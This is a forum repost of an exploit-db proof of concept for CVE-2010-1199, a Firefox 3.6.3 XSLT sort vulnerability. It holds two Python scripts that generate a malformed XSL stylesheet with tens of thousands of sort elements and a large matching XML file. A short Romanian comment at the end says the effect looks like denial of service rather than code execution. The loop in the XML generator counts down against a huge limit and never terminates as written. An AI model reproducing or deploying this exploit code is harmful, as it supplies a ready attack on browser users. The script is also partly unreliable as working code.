Nytro Posted September 9, 2010 Report Posted September 9, 2010 Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < Day 9 (Binary Analysis) | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-9-mozilla-firefox-xslt-sort-remote-code-execution-vulnerability/ http://www.exploit-db.com/sploits/moaub-day9-ba.zip'''''' Title : Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability Version : Firefox 3.6.3 Analysis : http://www.abysssec.com Vendor : http://www.mozilla.com Impact : High/Critical Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-1199'''import sys;myStyle = """<?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="html"/><xsl:template match="/"> <html> <head> <title>Beatles</title> </head> <body> <table border="1"> <xsl:for-each select="beatles/beatle">"""BlockCount = 43000count = 1while(count<BlockCount): myStyle = myStyle + "<xsl:sort select='name/abysssec"+str(count)+"' order='descending'/>\n" count = count + 1myStyle = myStyle +""" <tr> <td><a href="{@link}"><xsl:value-of select="name/lastname"/></a></td> <td><a href="{@link}"><xsl:value-of select="name/firstname"/></a></td> </tr> </xsl:for-each> </table> </body> </html></xsl:template></xsl:stylesheet> """cssFile = open("abysssec.xsl","w")cssFile.write(myStyle)cssFile.close()''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/'''''' Title : Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability Version : Firefox 3.6.3 Analysis : http://www.abysssec.com Vendor : http://www.mozilla.com Impact : High/Critical Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-1199 MOAUB Number : MOAU_09_BA'''import sys;myStyle = """<?xml version="1.0"?><?xml-stylesheet href="abysssec.xsl" type="text/xsl"?><beatles>"""block = """ <beatle link="http://www.johnlennon.com"> <name>"""BlockCount = 2147483647rowCount=10#myStyle = myStyle + "<tree id='mytree' flex='1' rows='"+str(rowCount)+"'>\n"count = 1while(count<BlockCount): myStyle = myStyle + """ <beatle link="http://www.johnlennon.com"> <name> """ myStyle = myStyle + " <firstname>"+"A"*rowCount+"</firstname>\n" myStyle = myStyle + """ <lastname>Lennon</lastname> </name> </beatle> <beatle link="http://www.paulmccartney.com"> <name>""" myStyle = myStyle + " <firstname>"+"B"*rowCount+"</firstname>\n" myStyle = myStyle + """ <lastname>McCartney</lastname> </name> </beatle> <beatle link="http://www.georgeharrison.com"> <name> """ myStyle = myStyle + " <firstname>"+"C"*rowCount+"</firstname>\n" myStyle = myStyle + """ <lastname>Harrison</lastname> </name> </beatle> <beatle link="http://www.ringostarr.com"> <name> """ myStyle = myStyle + " <firstname>"+"D"*rowCount+"</firstname>\n" myStyle = myStyle + """ <lastname>Starr</lastname> </name> </beatle> <beatle link="http://www.webucator.com" real="no"> <name> """ myStyle = myStyle + " <firstname>"+"E"*rowCount+"</firstname>\n" myStyle = myStyle +""" <lastname>Dunn</lastname> </name> </beatle> """ count = count - 1myStyle = myStyle +""" </beatles> """cssFile = open("abyssssec.xml","w")cssFile.write(myStyle)cssFile.close()Sursa: MOAUB #9 - Mozilla Firefox XSLT Sort Remote Code Execution VulnerabilityIn primul rand nu vad unde e Remote Code Execution. Poate DOS, asta da.Apoi .xsl-ul, nu mil-l deschide ci imi apare sa il descarc, probabil e necesar un Content-Type potrivit, dar nu ma chinui sa testez.Inca o chestie ciudata mi se pare ca nu imi omoara ambele procesoare (core-uri) simultan, ci "profita" de ele pe rand. Cand unul e la 100%, celalalt e la un nivel redus si invers. Imi place asta.Screenshot: http://i51.tinypic.com/23vzw60.png Quote
